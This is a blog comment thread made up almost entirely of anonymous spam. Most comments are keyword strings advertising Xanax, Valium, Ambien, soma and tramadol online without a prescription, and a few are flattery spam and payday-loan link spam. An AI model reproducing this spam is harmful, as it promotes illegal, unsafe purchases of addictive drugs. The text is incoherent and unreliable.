    diazepam drug para que serve diazepam 5mg - diazepam dosage insomnia

     
  • At 11:52 PM, Anonymous Anonymous said…

    diazepam 5mg much diazepam buy - diazepam vs xanax

     
  • At 1:16 AM, Anonymous Anonymous said…

    buy alprazolam online no prescription buy xanax alprazolam online - xanax bars how long in system

     
  • At 3:07 PM, Anonymous Anonymous said…

    xanax online where can i buy xanax online legally - xanax drug test

     
  • At 4:06 PM, Anonymous Anonymous said…

    buy xanax online without prescription buy xanax online with no prescription needed - xanax withdrawal caffeine

     
  • At 6:14 AM, Anonymous Anonymous said…

    order ativan online better high ativan klonopin - ativan overdose what to do

     
  • At 7:17 AM, Anonymous Anonymous said…

    ativan price ativan online with prescription - ativan dosage canada

     
  • At 7:22 AM, Anonymous Anonymous said…

    lorazepam drug xanax vs valium vs ativan vs klonopin - lorazepam 1mg compared xanax

     
  • At 8:11 AM, Anonymous Anonymous said…

    buy xanax xanax dosage 3719 - buy xanax no prescription + canada

     
  • At 8:56 AM, Anonymous Anonymous said…

    buy diazepam diazepam injection usp 10 mg automatic - diazepam side effects in kids

     
  • At 9:58 AM, Anonymous Anonymous said…

    buy diazepam diazepam dosage sciatica - diazepam to buy in usa

     
  • At 12:12 AM, Anonymous Anonymous said…

    buy xanax generic time release xanax - xanax side effects with alcohol

     
  • At 12:19 AM, Anonymous Anonymous said…

    xanax buy online no prescription xanax 1 mg blue pill - buy xanax online australia no prescription

     
  • At 2:49 AM, Anonymous Anonymous said…

    buy diazepam can you buy diazepam in portugal - diazepam 10 mg consecuencias

     
  • At 5:05 AM, Anonymous Anonymous said…

    buy xanax online forum xanax and alcohol yahoo answers - xanax withdrawal paranoia

     
  • At 1:53 AM, Anonymous Anonymous said…

    ambien on line generic ambien good regular ambien - buy ambien sleeping tablets

     
  • At 4:05 AM, Anonymous Anonymous said…

    ambien sleep medication zolpidem tartrate same ambien - generic ambien works best

     
  • At 11:47 PM, Anonymous Anonymous said…

    ambien buy side effects for ambien generic - generic ambien description

     
  • At 2:46 AM, Anonymous Anonymous said…

    buy ambien online no prescription ambien cr patient reviews - costco pharmacy ambien cr

     
  • At 8:14 AM, Anonymous Anonymous said…

    valium pill side effects of valium 5 mg - can i order valium online

     
  • At 12:31 PM, Anonymous Anonymous said…

    generic diazepam buy valium online from thailand - diazepam withdrawal symptoms valium

     
  • At 1:49 PM, Anonymous Anonymous said…

    online ambien ambien sleeping pills overdose - ambien cr snorting

     
  • At 5:47 PM, Anonymous Anonymous said…

    generic ambien online ambien side effects addiction - ambien price without insurance

     
  • At 11:44 PM, Anonymous Anonymous said…

    cheap soma generic soma images - somanabolic muscle maximizer vs sixpackshortcuts

     
  • At 1:32 AM, Anonymous Anonymous said…

    order soma online soma drug info - carisoprodol 350 mg wiki

     
  • At 1:41 AM, Anonymous Anonymous said…

    soma muscle generic soma with v - buy soma online pharmacy

     
  • At 5:59 AM, Anonymous Anonymous said…

    ambien order online no prescription ambien 10 mg alcohol - ambien side effects libido

     
  • At 7:55 AM, Anonymous Anonymous said…

    buy ambien online ambien with cold medication - can you buy ambien otc

     
  • At 12:40 PM, Anonymous Anonymous said…

    purchase soma carisoprodol soma high - buy soma online ship texas

     
  • At 12:57 PM, Anonymous Anonymous said…

    purchase ambien buy ambien 10mg online - ambien online no prescription canada

     
  • At 9:22 PM, Anonymous Anonymous said…

    purchase valium drug interactions vicodin and valium - valium joint pain

     
  • At 2:56 AM, Anonymous Anonymous said…

    buy ambien online ambien price walgreens - how to buy ambien cr

     
  • At 6:43 AM, Anonymous Anonymous said…

    generic soma generic somatropin buy - carisoprodol high blood pressure

     
  • At 6:08 AM, Anonymous Anonymous said…

    soma online carisoprodol controlled - side effects from carisoprodol 350

     
  • At 8:28 AM, Anonymous Anonymous said…

    online pharmacy for valium buy genuine valium online - diazepam 5mg tablets dosage

     
  • At 9:17 AM, Anonymous Anonymous said…

    buy soma online carisoprodol usos - assistir soma todos medos online

     
  • At 11:15 AM, Anonymous Anonymous said…

    diazepam without prescription valium side effects aggression - valium to buy online

     
  • At 2:43 PM, Anonymous Anonymous said…

    buy ambien online ambien drug test positive - ambien cr dosage options

     
  • At 5:56 PM, Anonymous Anonymous said…

    buy ambien online ambien side effects for men - ambien zolpidem 5 mg

     
  • At 7:47 PM, Anonymous Anonymous said…

    buy ambien online 2 10mg ambien - buy ambien online forum

     
  • At 12:18 AM, Anonymous Anonymous said…

    diazepam without prescription valium for cheap - valium narcotic drug

     
  • At 1:10 AM, Anonymous Anonymous said…

    order carisoprodol buy soma no prescription overnight - back medication soma

     
  • At 2:51 AM, Anonymous Anonymous said…

    ambien no prescription ambien 3 78 - ambien vs. generic zolpidem

     
  • At 4:19 AM, Anonymous Anonymous said…

    valium drug dose of valium for anxiety - valium 10 mg half life

     
  • At 7:23 PM, Anonymous Anonymous said…

    buy valium online valium online with mastercard - buy valium online no prescription in australia

     
  • At 10:14 PM, Anonymous Anonymous said…

    buy valium online valium seizure medication - valium tablets 5mg

     
  • At 8:28 AM, Anonymous Anonymous said…

    buy xanax valium online florida valium pill info - valium happy pills

     
  • At 9:31 AM, Anonymous Anonymous said…

    order valium online no prescription buy valium online cheap uk - buy valium from roche

     
  • At 12:39 AM, Anonymous Anonymous said…

    buy tramadol no prescription tramadol for dogs bluelight - tramadol online no prescription overnight cod

     
  • At 11:31 PM, Anonymous Anonymous said…

    Remarkable things hеre. I am ѵеry happy to seе youг
    article. Thanks sο much anԁ ӏ'm having a look ahead to touch you. Will you kindly drop me a e-mail?

    my weblog ... wicked article creator vs kontent machine

     
  • At 3:31 AM, Anonymous Anonymous said…

    Even if you do not have any security, you can gain quick income via installment payday loans [url=http://www.ukbunnyloans.co.uk/]http://www.ukbunnyloans.co.uk/[/url] payday loans 1 hour payday loans are generally controlled online as a result of internet, a while flaunted when fax less pay day loans http://www.jhgfpaydayloans.co.uk/

     
  • At 10:20 AM, Anonymous Anonymous said…

    Wе absolutely love your blog and fіnd
    most of your post's to be what precisely I'm looκing for.
    Does one оffer gueѕt writers to write cοntent available for you?
    I wouldn't mind creating a post or elaborating on many of the subjects you write concerning here. Again, awesome web log!

    Look into my web site - coffee pure cleanse And colo cleanse pro

     

Post a Comment

<< Home